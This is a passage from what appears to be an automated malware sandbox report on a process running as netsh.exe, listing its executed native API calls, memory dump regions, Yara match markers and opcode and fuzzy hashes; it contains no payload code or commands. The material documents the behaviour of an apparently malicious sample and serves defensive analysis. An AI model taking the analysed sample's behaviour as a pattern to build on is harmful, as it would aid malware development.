                                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                                    • API String ID: 885266447-3903918235
                                                                                                                                    • Opcode ID: 9c758bff1b830b25b028db6b3686360e020735e3c75e943af72cd36917386b6f
                                                                                                                                    • Instruction ID: d58588bf1bcd0d89e314507751841021aae068e8383bc9ed708248bfbb5429a0
                                                                                                                                    • Opcode Fuzzy Hash: 9c758bff1b830b25b028db6b3686360e020735e3c75e943af72cd36917386b6f
                                                                                                                                    • Instruction Fuzzy Hash: CCF0F632240212BFE6241A45DC46F33BF6AEB44731F244399F628561E1EA62F86096F4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Analysis Process: netsh.exe PID: 4768 Parent PID: 3424 netsh.exeCOMMON

                                                                                                                                    Executed Functions

                                                                                                                                    Function 02F78180, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,02F73B57,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F73B57,007A002E,00000000,00000060,00000000,00000000), ref: 02F781CD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID: .z`
                                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                    • Instruction ID: b50ee6a073bdbe60bf3d041f2316ef464278ae05fca107371e61ceee93126678
                                                                                                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                    • Instruction Fuzzy Hash: B8F0BDB2201208ABCB08DF88DC84EEB77EDAF8C754F158248FA0D97240C630E8118BA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F7817A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,02F73B57,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F73B57,007A002E,00000000,00000060,00000000,00000000), ref: 02F781CD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID: .z`
                                                                                                                                    • API String ID: 823142352-1441809116
                                                                                                                                    • Opcode ID: 88d1b07ae582fcbe2243286dfdbae8af6470fee96f81054242c4db3875054919
                                                                                                                                    • Instruction ID: 092e7f8a4b06b8a2434f03767756c0f90010a973bb36271ee84bcee878d19b94
                                                                                                                                    • Opcode Fuzzy Hash: 88d1b07ae582fcbe2243286dfdbae8af6470fee96f81054242c4db3875054919
                                                                                                                                    • Instruction Fuzzy Hash: 85F0F2B2210148AB8B08DF98D884CEB77A9AF8C354B05865DFA4D97202D230E851CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F782DA, Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(02F73CF0,?,?,02F73CF0,00000000,FFFFFFFF), ref: 02F782D5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: a9bd78225b6cc662e83a3cd0fea817019b4bb353d2b923a30800eb1ab656472f
                                                                                                                                    • Instruction ID: e4197105160b905ac13314c4e6e4e715e9167e09828f46aa2a9b173a56aea849
                                                                                                                                    • Opcode Fuzzy Hash: a9bd78225b6cc662e83a3cd0fea817019b4bb353d2b923a30800eb1ab656472f
                                                                                                                                    • Instruction Fuzzy Hash: 41F03CB5200608ABCB14EF99DC85EE777ADEF88794F11865AFA4D97201C630E951CBE0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F78230, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtReadFile.NTDLL(02F73D12,5E972F59,FFFFFFFF,02F739D1,?,?,02F73D12,?,02F739D1,FFFFFFFF,5E972F59,02F73D12,?,00000000), ref: 02F78275
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                    • Instruction ID: c9ea6ed2eb11b94eb364689abe1cc4350db88766b21ad424178bfe9b39a74dbe
                                                                                                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                    • Instruction Fuzzy Hash: 1DF0A4B2200208ABCB14DF89DC84EEB77ADAF8C754F158249BA1D97241D630E8118BA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F782AC, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(02F73CF0,?,?,02F73CF0,00000000,FFFFFFFF), ref: 02F782D5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: fc9d48b720c402bc301c074f6737587dfd43ab30e4baf1eb44069f8698a720d6
                                                                                                                                    • Instruction ID: 841ae97be1cfdf42c14a0a2d41d9136f6cbe75cc795b087c52cf2a1ab7e25d43
                                                                                                                                    • Opcode Fuzzy Hash: fc9d48b720c402bc301c074f6737587dfd43ab30e4baf1eb44069f8698a720d6
                                                                                                                                    • Instruction Fuzzy Hash: D9E0127A640510AFD710EFD9CC84ED77B99EF483A0F154595BA1DDB351D530ED1086E0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F782B0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(02F73CF0,?,?,02F73CF0,00000000,FFFFFFFF), ref: 02F782D5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                    • Instruction ID: 597422c80564f5eac981647c7bd39e6a4eefe5daa8c9deb1ec3959817f568f8e
                                                                                                                                    • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                    • Instruction Fuzzy Hash: 79D01776200214ABD710EF98CC89EA77BADEF487A0F154499BA199B242C530FA108AE0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 03749A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 51b039417ac6c64821142dfdf707f009183398cb95fa92b2a736b6fd7cc83f06
                                                                                                                                    • Instruction ID: a224a7d3868e8a0923dd602f69237bc99b0c4c7bbcd95e402dd0e161d7925b6c
                                                                                                                                    • Opcode Fuzzy Hash: 51b039417ac6c64821142dfdf707f009183398cb95fa92b2a736b6fd7cc83f06
                                                                                                                                    • Instruction Fuzzy Hash: E490026121184447E215A5694C14B070045D7D4343F51C129B4144554CCA9588A17561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 03749910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: efbbeb96dd72c7409900a4e75d5a8bcd0f3afe3c625b00a552ae41c589bbd171
                                                                                                                                    • Instruction ID: 288b3b6ffa03f32eea3e2e1f0e37ba9b2a6202d860dd349ea8da5cd5cb143d03
                                                                                                                                    • Opcode Fuzzy Hash: efbbeb96dd72c7409900a4e75d5a8bcd0f3afe3c625b00a552ae41c589bbd171
                                                                                                                                    • Instruction Fuzzy Hash: 129002B120104807E155B15944047460045D7D4341F51C025B9054554E87D98DD576A5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 037499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 313b2c5c4a65ee19f34efe2206d38de3dfdd1c674cafe3ea4530169e3add04dd
                                                                                                                                    • Instruction ID: cce5f7a20c106705a96afe422835269e835ebee03d333a07bee1cd7a10456486
                                                                                                                                    • Opcode Fuzzy Hash: 313b2c5c4a65ee19f34efe2206d38de3dfdd1c674cafe3ea4530169e3add04dd
                                                                                                                                    • Instruction Fuzzy Hash: 349002A134104847E115A1594414B060045D7E5341F51C029F5054554D8799CC927166
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 03749860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: e3f42a20fbac04f6fc0c42147e3b6b968545f59299366842fb750f715e0f2dbc
                                                                                                                                    • Instruction ID: 76226f6ebf0f4a6cb7ac888de060b4007c88f0aeff89e403aaac56e319ce3179
                                                                                                                                    • Opcode Fuzzy Hash: e3f42a20fbac04f6fc0c42147e3b6b968545f59299366842fb750f715e0f2dbc
                                                                                                                                    • Instruction Fuzzy Hash: 9290027120104817E126A15945047070049D7D4281F91C426B4414558D97D68992B161
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 03749840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 4b5f0f11adb5551aba27d3b54af8a9e4101e7626e715e325e3045927fbf7a4b4
                                                                                                                                    • Instruction ID: 36cd9b160fb1e287e41ad52172b6ccb7f92a2ebc5a9803aeedcdaf50ed1c3eac
                                                                                                                                    • Opcode Fuzzy Hash: 4b5f0f11adb5551aba27d3b54af8a9e4101e7626e715e325e3045927fbf7a4b4
                                                                                                                                    • Instruction Fuzzy Hash: 5590026124208557655AF15944045074046E7E4281791C026B5404950C86A69896F661
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 03749710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 806535a6db8b1a6602be2f1d87b95f2dd5d201f5691e9c3fe8629c6b3254b84a
                                                                                                                                    • Instruction ID: c4fefd9a80d6bc9dac0cf723444e20645814876f3b70b888fa440f95516a915f
                                                                                                                                    • Opcode Fuzzy Hash: 806535a6db8b1a6602be2f1d87b95f2dd5d201f5691e9c3fe8629c6b3254b84a
                                                                                                                                    • Instruction Fuzzy Hash: 4F90027120104807E115A59954086460045D7E4341F51D025B9014555EC7E588D17171
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 03749FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 028645e2b8cbc74b6df1d44e51f95e4eae1fe45f3f393c062659c4aaece68fc1
                                                                                                                                    • Instruction ID: d77f7007ec4fb14efaa48013145b72eda5106657821dc17033506fac2896c15b
                                                                                                                                    • Opcode Fuzzy Hash: 028645e2b8cbc74b6df1d44e51f95e4eae1fe45f3f393c062659c4aaece68fc1
                                                                                                                                    • Instruction Fuzzy Hash: 0A90027131118807E125A15984047060045D7D5241F51C425B4814558D87D588D17162
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 03749780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 45b274dd51e06a8b7b487009d5051e2400af576e6eb64ec6f870164393e49631
                                                                                                                                    • Instruction ID: c3d29d20ac2ce194e2cc5937d14e12187c0e9b10e0fab4186a5998a51045f64c
                                                                                                                                    • Opcode Fuzzy Hash: 45b274dd51e06a8b7b487009d5051e2400af576e6eb64ec6f870164393e49631
                                                                                                                                    • Instruction Fuzzy Hash: CD90026921304407E195B159540860A0045D7D5242F91D429B4005558CCA9588A97361
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 037496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 3b9c6d823b3801ea46454e27111c245ec1498704f24765aa64154052fd2508b7
                                                                                                                                    • Instruction ID: 4a240b18c478cbe5a9d5b0a8d7f0e5c06bd80edd070a0720b64c2e1836d3d133
                                                                                                                                    • Opcode Fuzzy Hash: 3b9c6d823b3801ea46454e27111c245ec1498704f24765aa64154052fd2508b7
                                                                                                                                    • Instruction Fuzzy Hash: 9B9002712010CC07E125A159840474A0045D7D4341F55C425B8414658D87D588D17161
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 037496D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: f30c8b4256a116ebd3894bef7b80cacfa3aa538bba0dcf3217d54804c46e8e74
                                                                                                                                    • Instruction ID: 358a3a04f0f05bd58ddc15ae6d0965bf47e4a10287fe777e756730880c849368
                                                                                                                                    • Opcode Fuzzy Hash: f30c8b4256a116ebd3894bef7b80cacfa3aa538bba0dcf3217d54804c46e8e74
                                                                                                                                    • Instruction Fuzzy Hash: 5B90027120104C47E115A1594404B460045D7E4341F51C02AB4114654D8795C8917561
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 03749540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: f513edb3732df7eda472423df05a8cfd04164c4d5af62b493da36ca1b7b23018
                                                                                                                                    • Instruction ID: 3f89e664cff5d26d40f6fa27dd17f6b6854d1b58e1cdb85d2a30d7a0b50c2667
                                                                                                                                    • Opcode Fuzzy Hash: f513edb3732df7eda472423df05a8cfd04164c4d5af62b493da36ca1b7b23018
                                                                                                                                    • Instruction Fuzzy Hash: E590026521104407111AE55907045070086D7D9391351C035F5005550CD7A188A17161
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 037495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914642285.00000000036E0000.00000040.00000001.sdmp, Offset: 036E0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.914791319.00000000037FB000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000009.00000002.914799363.00000000037FF000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 48be15794746dc041b13063bfc8672d9adbe68169d0101f41e53e7bcb023a7d3
                                                                                                                                    • Instruction ID: 148d82b9ab3f43cee6fbb2e008856722cb59b2f2c6f8b2614aeeeef774c3bcbe
                                                                                                                                    • Opcode Fuzzy Hash: 48be15794746dc041b13063bfc8672d9adbe68169d0101f41e53e7bcb023a7d3
                                                                                                                                    • Instruction Fuzzy Hash: 739002A120204407511AB1594414616404AD7E4241B51C035F5004590DC6A588D17165
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F76EA0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 02F76F48
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                    • Opcode ID: 665cde52c0c9eeff752de274a4b4138801be8d32270bfe9f3977a0eed58789d3
                                                                                                                                    • Instruction ID: d78dc572a7701de2995884c6db09c3f709cad8ba046e3f8d154a4d5af0026494
                                                                                                                                    • Opcode Fuzzy Hash: 665cde52c0c9eeff752de274a4b4138801be8d32270bfe9f3977a0eed58789d3
                                                                                                                                    • Instruction Fuzzy Hash: 26318FB5601704ABD715DFA8CCA0FA7B7F9FB88740F00846EF61A9B241E770A545CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F76E96, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 02F76F48
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep
                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                    • Opcode ID: bd90daf763ca2f3397c79b162de3364cbb583ca7afa9b546b2970b33780e615e
                                                                                                                                    • Instruction ID: 40eea15cf437b29a7854ce4a80beef492a99a6ffe7309a7a4e05e8f4039ff2b9
                                                                                                                                    • Opcode Fuzzy Hash: bd90daf763ca2f3397c79b162de3364cbb583ca7afa9b546b2970b33780e615e
                                                                                                                                    • Instruction Fuzzy Hash: 11218FB1A01705ABD714DF68CCA1FAAB7B8EB48744F00806AF6199B241D370A545CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F78490, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F63B93), ref: 02F784BD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID: .z`
                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                    • Instruction ID: 96277400ddbd559d594004ab717c1a262f9ea03b0a20b93fc2adfe0477e1fe62
                                                                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                    • Instruction Fuzzy Hash: B6E046B1200208ABDB18EF99CC48EA777ADEF88790F018559FE095B341C630F910CAF0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F78417, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F63B93), ref: 02F784BD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID: .z`
                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                    • Opcode ID: 7823eba54d531895dbe16584de8136b7a6d2a02c3d65992cb9819949653a5d18
                                                                                                                                    • Instruction ID: c196991883ba46d2dfb9ead9d3ea75b139068230c2f1c19f9d7dee860f1db2e5
                                                                                                                                    • Opcode Fuzzy Hash: 7823eba54d531895dbe16584de8136b7a6d2a02c3d65992cb9819949653a5d18
                                                                                                                                    • Instruction Fuzzy Hash: 13E0DFB80006844FDB24EE28D8C0C9B3795BF80254B108B8AE84947203C231D85B8AA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 02F7848E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F63B93), ref: 02F784BD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID: .z`
                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                    • Opcode ID: bfdc93135bb8e1f01ad17a6c2756a181809ba613a77c2e68333703720b866323
                                                                                                                                    • Instruction ID: 9b1fccf54d7f56a353fd86c1dc5313c3e8fb3a6080107c559f411ea5332d6e02
